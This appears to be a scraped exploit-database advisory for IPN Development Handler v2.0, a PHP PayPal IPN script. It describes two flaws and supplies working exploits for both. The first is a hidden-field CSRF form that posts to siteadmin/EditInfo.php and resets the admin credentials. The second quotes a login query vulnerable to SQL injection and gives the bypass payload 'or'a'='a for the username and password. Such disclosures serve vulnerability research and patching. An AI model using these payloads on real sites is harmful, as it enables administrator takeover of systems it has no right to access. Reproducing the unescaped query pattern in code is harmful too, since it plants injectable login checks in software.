IPN Development Handler v2.0 CSRF (Change Admin Account)

vendor:

IPN Development Handler

by:

AtT4CKxT3rR0r1ST

5.5

CVSS

MEDIUM

CSRF

352

CWE

Product Name: IPN Development Handler

Affected Version From: IPN Development Handler v2.0

Affected Version To: IPN Development Handler v2.0

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

IPN Development Handler v2.0 CSRF (Change Admin Account)

This exploit allows an attacker to change the admin account credentials by submitting a form with hidden input fields containing the new username and password values. The form action URL is http://localhost/siteadmin/EditInfo.php.

Mitigation:

To mitigate this vulnerability, ensure that proper input validation and authentication mechanisms are in place to prevent unauthorized access or modification of admin account credentials.

Source

Exploit-DB raw data:

IPN Development Handler v2.0 CSRF (Change Admin Account)
==============================================================

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Script         : http://scripts.filehungry.com/product/php/e-commerce/paypal/ipn_development_handler/

####################################################################


===[ Exploit ]===

<form method="POST" name="form0" action="http://localhost/siteadmin/EditInfo.php">
<input type="hidden" name="username" value="admin"/>
<input type="hidden" name="password" value="123456"/>
<input type="hidden" name="password2" value="123456"/>
<input type="hidden" name="s1" value="Update"/>
</form>

</body>
</html>

####################################################################

IPN Development Handler v2.0 Auth Bypass
==============================================================

####################################################################
.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
.:. Script : http://scripts.filehungry.com/product/php/e-commerce/paypal/ipn_development_handler/

####################################################################

===[ Vulnerability ]===
Source Code path/siteadmin/login.php

if(isset($_POST[s2]))
{
$MyUsername1 = strip_tags($_POST[username1]);
$MyPassword1 = strip_tags($_POST[password1]);

if(empty($MyUsername1) || empty($MyPassword1))
{
$MyError = "<center><font color=red size=2 face=verdana><b>All fields are required!</b></font></center>";
}
else
{
//check the login info if exists
$q1 = "select * from dd_admin where username = '$MyUsername1' and password = '$MyPassword1' ";

$r1 = mysql_query($q1);

if(!$r1)
{
echo mysql_error();
exit();

===[ Exploit ]===

1- Go to Siteadmin [www.site.com/siteadmin/login.php]
2- join code Auth Bypass in Username & Password
3- Username: 'or'a'='a
Password: 'or'a'='a


####################################################################